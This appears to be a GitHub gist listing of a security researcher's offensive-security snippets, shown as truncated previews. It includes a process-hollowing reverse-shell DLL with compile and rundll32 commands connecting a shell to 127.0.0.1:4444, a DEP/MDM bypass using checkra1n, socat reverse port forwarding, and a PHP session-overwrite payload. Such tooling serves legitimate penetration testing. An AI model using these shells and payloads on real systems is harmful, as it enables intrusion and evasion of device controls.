Frank Spierings FrankSpierings

@FrankSpierings
FrankSpierings / samlraider.py
Created February 25, 2021 12:57
SAMLRaider in Python, useful to automate (new) logins and the automatic exploit checks.
import xml.dom.minidom as minidom

# Constants
COLLABORATOR = 'example.burpcollaborator.net'


class SAMLRaider():
    def __init__(self, match_replace_map: dict = None):
        """SAMLRaider object
@FrankSpierings
FrankSpierings / README.MD
Last active February 5, 2024 15:25
Apple Device Enrollment Program (DEP) - ByPass MDM Policy using Checkra1n exploit

Pre-requirements

  • Install a socket daemon to multiplex connections from and to iOS devices, run: brew install usbmuxd
  • Start the socket daemon iproxy 2222 44
  • Install checkra1n exploit locally, run: brew install checkra1n
  • When SSH password authentication is requested, use: alpine.

Wipe iPad and restore Firmware

@FrankSpierings
FrankSpierings / process-hollow-shell-dll.c
Last active August 30, 2022 20:46
Reverse shell which uses process hollowing technique
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non-Microsoft DLLs into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
//
// Run:
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe
@FrankSpierings
FrankSpierings / request-minify.py
Last active February 9, 2021 13:17
Burp extension to minify a request's headers and parameters into another Repeater tab.
from burp import IParameter
from burp import IBurpExtender
from burp import IContextMenuFactory
from burp import IContextMenuInvocation
from javax.swing import JMenuItem
import java.util.ArrayList as ArrayList
from threading import Thread
from Queue import Queue
from traceback import format_exc
import time
@FrankSpierings
FrankSpierings / burp-ntfs-ads-scan.py
Last active November 10, 2020 08:15
Burp NTFS Alternative Data Stream Scanner
# coding=utf-8
from burp import IBurpExtender
from burp import IScannerCheck
from burp import IScanIssue
from burp import IScannerInsertionPoint
from array import array
class BurpExtender(IBurpExtender, IScannerCheck):
@FrankSpierings
FrankSpierings / cookie-authenticated-onedrive-enum.py
Created October 6, 2020 16:02
Checks OneDrive access based on someone's UPN.
@FrankSpierings
FrankSpierings / README.MD
Last active June 5, 2021 08:11
Windows Reverse Port Forwarding using C# / Powershell

Socat

  • On the lhost listening side you can use socat to create two server sockets.
socat -dd TCP-LISTEN:4444,reuseaddr,fork TCP-LISTEN:1234,reuseaddr
  • Once WPF has connected to port 4444, you can talk to 127.0.0.1:1234 as if it were the remote host.
@FrankSpierings
FrankSpierings / sample-php-socket-connect.php
Created August 11, 2020 09:47
PHP Socket Connect Example Reference
<?php
$host = "ifconfig.co";
$port = 80;
$msg = "GET / HTTP/1.1\r\nHost: $host\r\n\r\n";
// Create a TCP socket and connect to the remote host; abort on failure.
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock === false || socket_connect($sock, $host, $port) === false) {
    die("socket error: " . socket_strerror(socket_last_error()) . "\n");
}
// Send the raw HTTP request and read (at most) the first 4096 bytes of the response.
socket_send($sock, $msg, strlen($msg), 0);
$result = socket_read($sock, 4096);
echo $result;
socket_close($sock);
@FrankSpierings
FrankSpierings / README.MD
Created August 6, 2020 13:19
Session overwrite in PHP through extract - PoC

Exploit

  • POST-ing a body containing _SESSION[secret]=1 will log you in, but only through the second extract.
<?xml version="1.0"?>
<!DOCTYPE dt [
<!ENTITY sample "KqsdwTrqAisGYNNu5XMhkUV4gTxm8ed8">
]>
<root>&sample;</root>